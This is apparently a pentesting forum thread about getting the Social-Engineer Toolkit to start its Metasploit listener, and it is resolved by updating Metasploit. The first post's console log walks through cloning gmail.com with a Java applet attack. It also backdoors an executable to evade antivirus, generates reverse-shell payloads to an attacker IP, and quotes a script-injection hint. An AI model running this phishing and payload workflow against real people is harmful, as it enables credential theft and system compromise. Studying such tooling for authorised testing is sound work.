Results 1 to 5 of 5

Thread: SET can not rum MSF

  1. #1
    Just burned his ISO
    Join Date
    Oct 2010
    Posts
    4

    Smile SET can not rum MSF

    i want to test SET on my home network but it seems set can not run MSF and call it unknown parameters and MSF gave me this error
    :[*] Launching MSF Listener...[*] This may take a few to load MSF...
    Invalid option, try -h for usage

    i updates both set and msfconsole from set update options.

    here is my config/set_config for set:

    i removed some comment lines because my post was more than 10,000 char
    Code:
    # DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
    METASPLOIT_PATH=/pentest/exploits/framework3
    
    ETTERCAP=OFF
    # EXAMPLE: ETTERCAP_INTERFACE=wlan0
    ETTERCAP_INTERFACE=eth0
    #
    ETTERCAP_PATH=/usr/share/ettercap
    #
    SENDMAIL=OFF
    #
    WEBATTACK_EMAIL=OFF
    
    SELF_SIGNED_APPLET=ON
    
    AUTO_DETECT=ON
    WEB_PORT=80
    CUSTOM_EXE=src/exe/legit.binary
    
    MLITM_PORT=80
    
    APACHE_SERVER=OFF
    
    APACHE_DIRECTORY=/var/www
    
    WEBATTACK_SSL=ON
    
    SELF_SIGNED_CERT=OFF
    PEM_CLIENT=/root/newcert.pem
    PEM_SERVER=/root/newreq.pem
    
    WEBJACKING_TIME=2000
    ###################################################################################################
    and here is all i do with set:

    Code:
    root@bt:/pentest/exploits/SET# ./set
    
       
    
      [---]       The Social-Engineer Toolkit (SET)          [---]
      [---]        Written by David Kennedy (ReL1K)          [---]
      [---]                 Version: 0.7.1                   [---]
      [---]             Codename: 'Swagger Wagon'            [---]
      [---]     Report bugs to: davek@social-engineer.org    [---]
      [---]        Java Applet Written by: Thomas Werth      [---]
      [---]        Homepage: http://www.secmaniac.com        [---]
      [---]     Framework: http://www.social-engineer.org    [---]
      [---]       Over 1 million downloads and counting.     [---]
    
       Welcome to the Social-Engineer Toolkit (SET). Your one
        stop shop for all of your social-engineering needs..
    
                 Follow me on Twitter: dave_rel1k
    
         DerbyCon 2011 Sep29-Oct02 - A new era begins...
      irc.freenode.net - #DerbyCon - http://www.derbycon.com
    
    Select from the menu:
    
    1.  Spear-Phishing Attack Vectors
    2.  Website Attack Vectors
    3.  Infectious Media Generator
    4.  Create a Payload and Listener
    5.  Mass Mailer Attack
    6.  Teensy USB HID Attack Vector
    7   Update the Metasploit Framework
    8.  Update the Social-Engineer Toolkit
    9.  Help, Credits, and About
    10. Exit the Social-Engineer Toolkit
    
    Enter your choice: 2
    
    1. The Java Applet Attack Method
    2. The Metasploit Browser Exploit Method
    3. Credential Harvester Attack Method
    4. Tabnabbing Attack Method
    5. Man Left in the Middle Attack Method
    6. Web Jacking Attack Method
    7. Multi-Attack Web Method
    8. Return to the previous menu
    
    Enter your choice (press enter for default): 1
    
    
    The first method will allow SET to import a list of pre-defined
    web applications that it can utilize within the attack.
    
    The second method will completely clone a website of your choosing
    and allow you to utilize the attack vectors within the completely
    same web application you were attempting to clone.
    
    The third method allows you to import your own website, note that you
    should only have an index.html when using the import website
    functionality.
    
    [!] Website Attack Vectors [!]
    
    1. Web Templates
    2. Site Cloner
    3. Custom Import
    4. Return to main menu
    
    Enter number (1-4): 2
    Enter your interface IP Address: 192.168.1.2
    
    SET supports both HTTP and HTTPS
    Example: http://www.thisisafakesite.com
    Enter the url to clone: https://gmail.com
    [*] Cloning the website: https://gmail.com[*] This could take a little bit...[*] Injecting Java Applet attack into the newly cloned website.[*] Filename obfuscation complete. Payload name is: 8NVni6l[*] Malicious java applet website prepped for deployment
    
    What payload do you want to generate:
    
    Name:                                      Description:
    
    1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
    2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
    3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
    4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
    5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
    6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
    7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
    8. Windows Meterpreter Egress Buster       Spawn a meterpreter shell and find a port home via multiple ports
    9. Windows Meterpreter Reverse HTTPS       Tunnel communication over HTTP using SSL and use Meterpreter
    10. Import your own executable              Specify a path for your own executable
    
    Enter choice (hit enter for default):
    
    Below is a list of encodings to try and bypass AV.
    
    Select one of the below, 'backdoored executable' is typically the best.
    
    1. avoid_utf8_tolower (Normal)
    2. shikata_ga_nai (Very Good)
    3. alpha_mixed (Normal)
    4. alpha_upper (Normal)
    5. call4_dword_xor (Normal)
    6. countdown (Normal)
    7. fnstenv_mov (Normal)
    8. jmp_call_additive (Normal)
    9. nonalpha (Normal)
    10. nonupper (Normal)
    11. unicode_mixed (Normal)
    12. unicode_upper (Normal)
    13. alpha2 (Normal)
    14. No Encoding (None)
    15. Multi-Encoder (Excellent)
    16. Backdoored Executable (BEST)
    
    Enter your choice (enter for default): 16
    [-] Enter the PORT of the listener (enter for default):
    
    [-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds...
    [-] Backdoor completed successfully. Payload is now hidden within a legit executable.
    
    ********************************************************
    Do you want to create a Linux/OSX reverse_tcp payload
    in the Java Applet attack as well?
    ********************************************************
    
    Enter choice yes or no: yes
    Enter the port to listen for on OSX: 8080
    Enter the port to listen for on Linux: 8081
    Created by msfpayload (http://www.metasploit.com).
    Payload: osx/x86/shell_reverse_tcp
     Length: 65
    Options: LHOST=192.168.1.2,LPORT=8080
    Created by msfpayload (http://www.metasploit.com).
    Payload: linux/x86/shell/reverse_tcp
     Length: 50
    Options: LHOST=192.168.1.2,LPORT=8081
    
    ***************************************************
    Web Server Launched. Welcome to the SET Web Attack.
    ***************************************************
    
    [--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--]
    [*] Launching MSF Listener...[*] This may take a few to load MSF...
    Invalid option, try -h for usage
    
    The Social-Engineer Toolkit "Web Attack" vector is a unique way of
    utilizing multiple web-based attacks in order to compromise the
    intended victim.
    
    Enter what type of attack you would like to utilize.
    
    The Java Applet attack will spoof a Java Certificate and
    deliver a metasploit based payload. Uses a customized
    java applet created by Thomas Werth to deliver
    the payload.
    
    The Metasploit browser exploit method will utilize select
    Metasploit browser exploits through an iframe and deliver
    a Metasploit payload.
    
    The Credential Harvester Method will utilize web cloning
    of a website that has a username and password field and
    harvest all the information posted to the website.
    
    The TabNabbing Method will wait for a user to move to a
    different tab, then refresh the page to something different.
    
    The Man Left in the Middle Attack Method was introduced by
    Kos and utilizes HTTP REFERER's in order to intercept fields
    and harvest data from them. You need to have an already vulnerable
    site and incorporate <script src="http://YOURIP/">. This could either
    be from a compromised site or through XSS.
    
    The web jacking attack method was introduced by white_sheep, Emgent
    and the Back|Track team. This method utilizes iframe replacements to
    make the highlighted URL link to appear legitimate however when clicked
    a window pops up then is replaced with the malicious link. You can edit
    the link replacement settings in the set_config if its too slow/fast.
    
    The multi-attack will add a combination of attacks through the web attack
    menu. For example you can utilize the Java Applet, Metasploit Browser,
    Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
    all at once to see which is successful.
    
    1. The Java Applet Attack Method
    2. The Metasploit Browser Exploit Method
    3. Credential Harvester Attack Method
    4. Tabnabbing Attack Method
    5. Man Left in the Middle Attack Method
    6. Web Jacking Attack Method
    7. Multi-Attack Web Method
    8. Return to the previous menu
    
    Enter your choice (press enter for default): ^C
    
    Thank you for shopping at the Social-Engineer Toolkit.
    
    Hack the Gibson...

  2. #2
    Good friend of the forums espreto's Avatar
    Join Date
    Mar 2010
    Location
    Brazil
    Posts
    303

    Default Re: SET can not rum MSF

    In set_config, change APACHE_SERVER=OFF to APACHE_SERVER=ON. See whether it will solve!

    Regards.
    (gdb) disass m(y_br)ain

    ®

  3. #3
    Just burned his ISO
    Join Date
    Oct 2010
    Posts
    4

    Default Re: SET can not rum MSF

    Quote Originally Posted by espreto View Post
    In set_config, change APACHE_SERVER=OFF to APACHE_SERVER=ON. See whether it will solve!

    Regards.
    i just updated msf today and problem gone!
    thanks for reply anyway

  4. #4
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    19

    Default Re: SET can not rum MSF

    This was due to the additional flag values that msfconsole now has to disable database support and other features to make it load much faster. Just need to svn update (as you mentioned) to fix the issues!

    -ReL

  5. #5
    My life is this forum thorin's Avatar
    Join Date
    Jan 2010
    Posts
    2,629

    Default Re: SET can not rum MSF

    I'm glad your issue has been resolved. I was coming to see if I could help but since it's over I just want to add the following after reading the subject line Mmmmmmm RUM

    I know M and N are side by side on the keyboard so it was a simple mistake....but it made me smile and want to share.....
    I'm a compulsive post editor, you might wanna wait until my post has been online for 5-10 mins before quoting it as it will likely change.

    I know I seem harsh in some of my replies. SORRY! But if you're doing something illegal or posting something that seems to be obvious BS I'm going to call you on it.

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •